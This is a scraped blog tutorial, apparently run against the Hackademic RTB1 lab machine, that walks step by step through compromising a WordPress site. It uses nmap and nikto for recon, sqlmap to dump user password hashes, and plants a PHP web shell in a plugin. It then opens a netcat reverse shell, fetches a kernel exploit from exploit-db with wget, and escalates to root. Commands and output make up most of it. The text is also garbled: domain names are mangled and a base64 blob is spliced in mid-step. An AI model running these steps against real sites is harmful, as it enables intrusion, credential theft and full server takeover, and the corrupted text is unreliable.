The answer to this question may be difficult to determine, simply because there are so many ways to hack a site. Our aim in this article to show you the techniques most used by hackers in targeting and hacking your site!
Let’s suppose that this is your site: hack-test测试数据
Let’s ping this site to get the server IP:
Now we have 173.236.138.113 – this is the server IP where our target site is hosted.
To find other sites hosted on the same server, we will use sameip.org:
Same IP 26 sites hosted on IP Address 173.236.138.113
ID Domain Site Link 1 hijackthisforum测试数据 hijackthisforum测试数据 2 sportforum.net sportforum.net 3 freeonlinesudoku.net freeonlinesudoku.net 4 cosplayhell测试数据 cosplayhell测试数据 5 videogamenews.org videogamenews.org 6 gametour测试数据 gametour测试数据 7 qualitypetsitting.net qualitypetsitting.net 8 brendanichols测试数据 brendanichols测试数据 9 8ez测试数据 8ez测试数据 10 hack-test测试数据 hack-test测试数据 11 kisax测试数据 kisax测试数据 12 paisans测试数据 paisans测试数据 13 mghz测试数据 mghz测试数据 14 debateful测试数据 debateful测试数据 15 jazzygoodtimes测试数据 jazzygoodtimes测试数据 16 fruny测试数据 fruny测试数据 17 vbum测试数据 vbum测试数据 18 wuckie测试数据 wuckie测试数据 19 force5inc测试数据 force5inc测试数据 20 virushero测试数据 virushero测试数据 21 twincitiesbusinesspeernetwork测试数据 twincitiesbusinesspeernetwork测试数据 22 jennieko测试数据 jennieko测试数据 23 davereedy测试数据 davereedy测试数据 24 joygarrido测试数据 joygarrido测试数据 25 prismapp测试数据 prismapp测试数据 26 utiligolf测试数据 utiligolf测试数据Twenty-six other websites are hosted on this server [173.236.138.113]. Many hackers will target all other sites on the same server in order to hack your site. But for the purpose of study, we will target your site only and put aside hacking the other sites on same server.
We’ll need more information about your site, such as:
DNS records (A, NS, TXT, MX and SOA) Web Server Type (Apache, IIS, Tomcat) Registrar (the company that owns your domain) Your name, address, email and phone Scripts that your site uses (php, asp, asp.net, jsp, cfm) Your server OS (Unix,Linux,Windows,Solaris) Your server open ports to internet (80, 443, 21, etc.)Let’s start with finding your site’s DNS records. We will use the website [Who.is] to achieve this:
We have discovered that your site DNS records are:
HACK-TEST.COM DNS RECORDS
Record Type TTL Priority Content hack-test测试数据 A 4 hours 173.236.138.113 () hack-test测试数据 SOA 4 hours ns1.dreamhost测试数据. hostmaster.dreamhost测试数据. 2011032301 15283 1800 1814400 14400 hack-test测试数据 NS 4 hours ns1.dreamhost测试数据 hack-test测试数据 NS 4 hours ns3.dreamhost测试数据 hack-test测试数据 NS 4 hours ns2.dreamhost测试数据 HdhCmsTesthack-test测试数据 A 4 hours 173.236.138.113 ()
Let’s determine the web server type:
As you see, your site web server is Apache. We will determine its version later.
HACK-TEST.COM SITE INFORMATION
IP: 173.236.138.113 Website Status: active Server Type: Apache Alexa Trend/Rank: 0 1 Month: 3,213,968 3 Month: 2,161,753 Page Views per Visit: 1 Month: 2.0 3 Month: 3.7
Now it is time to find your Doman Registrar and your name, address, email and phone:
We have now got your registrar and other vital information about you. We can find the type of scripts on your site (the OS type, web server version) by using a cool tool in backtrack 5 R1 called Whatweb:
Now we found that your site is using a famous php script called WordPress, that your server os is Fedora Linux and that your web server version is (apache 2.2.15), let’s find open ports in your server.
To do this, we will use nmap:
1 – Find services that run on server
root@bt:/# nmap -sV hack-test测试数据 Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EET Nmap scan report for hack-test测试数据 (192.168.1.2) Host is up (0.0013s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd 2.2.15 ((Fedora)) MAC Address: 00:0C:29:01:8A:4D (VMware) Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds2 – Find server OS
root@bt:/# nmap -O hack-test测试数据 Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET Nmap scan report for hack-test测试数据 (192.168.1.2) Host is up (0.00079s latency). Not shown: 998 filtered ports PORT STATE SERVICE 22/tcp closed ssh 80/tcp open http MAC Address: 00:0C:29:01:8A:4D (VMware) Device type: general purpose Running: Linux 2.6.X OS details: Linux 2.6.22 (Fedora Core 6) Network Distance: 1 hop OS detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.42 secondsOnly port 80 is open and OS is Linux 2.6.22(Fedora Core 6)
Now that we have gathered all the important information about your site, let’s scan it for vulnerabilities like
Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF, and so forth.
We will use Nikto.pl to gather info, perhaps, some vulnerabilities:
root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test测试数据 - Nikto v2.1.4 --------------------------------------------------------------------------- + Target IP: 192.168.1.2 + Target Hostname: hack-test测试数据 + Target Port: 80 + Start Time: 2011-12-29 06:50:03 --------------------------------------------------------------------------- + Server: Apache/2.2.15 (Fedora) + ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b + Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + 6448 items checked: 1 error(s) and 6 item(s) reported on remote host + End Time: 2011-12-29 06:50:37 (34 seconds) --------------------------------------------------------------------------- + 1 host(s) testedroot@bt:/pentest/web/w3af# ./w3af_gui Starting w3af, running on: Python version: 2.6.5 (r265:79063, Apr 16 2010, 13:57:41) [GCC 4.4.3] GTK version: 2.20.1 PyGTK version: 2.17.0 w3af - Web Application Attack and Audit Framework Version: 1.2 Revision: 4605 Author: Andres Riancho and the w3af team.
We will insert our site URL and choose full audit option:
After some time, the scan will finish and you will see
Your site is vulnerable to sql injection, xss and others!
Let’s investigate the sql injection vulnerability:
http://hack-test测试数据/Hackademic_RTB1/?cat=d%27z%220
This is the vulnerable url and cat is the vulnerable parameter.
So, let’s exploit this vulnerability:
We will find that exploitating this vuln failed, so we will use sqlmap to the job and dump all database information that we need to hack this site J
Using sqlmap with –u url
After some seconds you will see
Type n and press enter to continue
Let’s find all databases in your site by adding [–dbs ]
Now we found 3 databases
We will dump wordpress database tables by adding [–D wordpress –tables ]
We will find all wordpress tables
We want to dump [wp_users] table, so we will find all users (admin?) information (user is and password hash) and try to crack hash and enter wordpress control panel ( wp-admin)
We will columns of [wp_users] table by adding [-T wp_users –columns ]
We will find 22 columns
We just need to dump to columns, so we will dump (user_login and user_pass ) columns by adding
-C user_login,user_pass –dump
We will find important information; we found now users and pass hashes
but we want to crack those hashes to clear text passwords. We will use the online site [ http://HdhCmsTestonlinehashcrack测试数据/free-hash-reverse.php ]
And try to crack this hash 7CBB3252BA6B7E9C422FAC5334D22054
And clear text password is q1w2e3
And user name is [GeorgeMiller]
We will login with these details in [wp-admin ]
And we are in!
Ok let’s try to upload php web shell to run some linux commands on your site server J
We will edit a plugin in wordpress called [ Textile ] or any plugin you found in plugins page.
And choose to edit it
We will insert php web shell instead of real plugin. After we’ve done this, we will hit [update file] and browse to our new php shell
Woo, the php shell works. Now we can manipulate your site files, but we want only to get root on your server and hack all other sites too.
We will choose [back-connect [tab from php web shell and make back connection to our ip [192.168.1.6″ on port [5555″
But before we hit connect, we first make netcat listen on port [5555″ on our attacker machine
Now hit connect and you will see:
Let’s try some linux commands
id uid=48(apache) gid=489(apache) groups=489(apache) pwd /var/www/html/Hackademic_RTB1/wp-content/plugins uname -a Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/LinuxId command is used to show us what user id, group.
pwd command is used to show us our current path on server
uname –a command is used to show us some information about kernel version
Let’s search in exploit-db测试数据 for exploit to this version or newer version
We will type [kernel 2.6.31 ]
Date D A V Description Plat. Author 2009-10-15 - Linux Kernel < 2.6.31-rc4 nfs4_proc_lock() Denial of Service 904 linux Simon Vallet 2009-08-31 ::__IHACKLOG_REMOTE_IMAGE_AUTODOWN_BLOCK__::1 - Linux Kernel < 2.6.31-rc7 AF_IRDA 29-Byte Stack Disclosure Exploit 1370 linux Jon Oberheide 2009-08-25 ::__IHACKLOG_REMOTE_IMAGE_AUTODOWN_BLOCK__::2 - Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure 1059 linux Jon Oberheide 2009-08-04 ::__IHACKLOG_REMOTE_IMAGE_AUTODOWN_BLOCK__::3 - Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit 1064 linux Jon Oberheide
After I tried all of them on your server, none of them worked, but then I tried a new exploit
Date D A V Description Plat. Author 2010-10-19 ::__IHACKLOG_REMOTE_IMAGE_AUTODOWN_BLOCK__::4 - Linux RDS Protocol Local Privilege Escalation 9977 linux Dan Rosenberg
http://HdhCmsTestexploit-db测试数据/exploits/15285
I opened this url and copied this link
And made this command on my netcat shell
wget http://HdhCmsTestexploit-db测试数据/download/15285 -O roro.c --2011-12-28 00:48:01-- http://HdhCmsTestexploit-db测试数据/download/15285 Resolving HdhCmsTestexploit-db测试数据... 199.27.135.111, 199.27.134.111 Connecting to HdhCmsTestexploit-db测试数据"199.27.135.111|:80... connected. HTTP request sent, awaiting response... 301 Moved Permanently Location: http://HdhCmsTestexploit-db测试数据/download/15285/ [following] --2011-12-28 00:48:02-- http://HdhCmsTestexploit-db测试数据/download/15285/ Connecting to HdhCmsTestexploit-db测试数据|199.27.135.111|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 7154 (7.0K) [application/txt] Saving to: `roro.c' 0K ...... 100% 29.7K=0.2s
We used wget command to fetch exploit from exploit-db测试数据 and used –O to rename it to roro.c
Note: linux kernel exploits mostly is being delopped in c language so we saved it in .c extension, just view exploit source and you will find #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <fcntl.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <errno.h> #include <string.h> #include <sys/ptrace.h> #include <sys/utsname.h> #define RECVPORT 5555 #define SENDPORT 6666 int prep_sock(int port) { int s, ret; struct sockaddr_in addr; s = socket(PF_RDS, SOCK_SEQPACKET, 0); if(s < 0) { printf([[*] Could not open socket.\n]); exit(-1); } memset(&addr, 0, sizeof(addr)); All the above lines indicate that this is exploit is written in C language
After we saved our exploit on server, we will compile it to elf format by typing
gcc roro.c –o roro
And run our exploit by typing
./rZ喎"http://HdhCmsTest2cto测试数据/kf/ware/vc/" target="_blank" class="keylink">vc m8gDQoNClsqXSBMaW51eCBrZXJuZWwgJmd0Oz0gMi42LjMwIFJEUyBzb2NrZXQgZXhwbG9pdA0KWypdIGJ5IERhbiBSb3NlbmJlcmcNClsqXSBSZXNvbHZpbmcga2VybmVsIGFkZHJlc3Nlcy4uLg0KWytdIFJlc29sdmVkIHJkc19wcm90b19vcHMgdG8gMHhlMDlmMGIyMA0KWytdIFJlc29sdmVkIHJkc19pb2N0bCB0byAweGUwOWRiMDZhDQpbK10gUmVzb2x2ZWQgY29tbWl0X2NyZWRzIHRvIDB4YzA0NGU1ZjENClsrXSBSZXNvbHZlZCBwcmVwYXJlX2tlcm5lbF9jcmVkIHRvIDB4YzA0NGU0NTINClsqXSBPdmVyd3JpdGluZyBmdW5jdGlvbiBwb2ludGVyLi4uDQpbKl0gTGludXgga2VybmVsICZndDs9IDIuNi4zMCBSRFMgc29ja2V0IGV4cGxvaXQNClsqXSBieSBEYW4gUm9zZW5iZXJnDQpbKl0gUmVzb2x2aW5nIGtlcm5lbCBhZGRyZXNzZXMuLi4NClsrXSBSZXNvbHZlZCByZHNfcHJvdG9fb3BzIHRvIDB4ZTA5ZjBiMjANClsrXSBSZXNvbHZlZCByZHNfaW9jdGwgdG8gMHhlMDlkYjA2YQ0KWytdIFJlc29sdmVkIGNvbW1pdF9jcmVkcyB0byAweGMwNDRlNWYxDQpbK10gUmVzb2x2ZWQgcHJlcGFyZV9rZXJuZWxfY3JlZCB0byAweGMwNDRlNDUyDQpbKl0gT3ZlcndyaXRpbmcgZnVuY3Rpb24gcG9pbnRlci4uLg0KWypdIFRyaWdnZXJpbmcgcGF5bG9hZC4uLg0KWypdIFJlc3RvcmluZyBmdW5jdGlvbiBwb2ludGVyLi4uPC9wcmU+DQo8cCBzdHlsZT0="background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: transparent; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; margin-top: 8px; margin-right: 0px; margin-bottom: 8px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; outline-width: 0px; outline-style: initial; outline-color: initial; vertical-align: baseline; white-space: normal; word-break: normal; ">And after that we typeId
We will find that we are root J
uid=0(root) gid=0(root) 作者 Robert's Blog
查看更多关于How Hackers Target and Hack Your Site - 网站安全 - 自学的详细内容...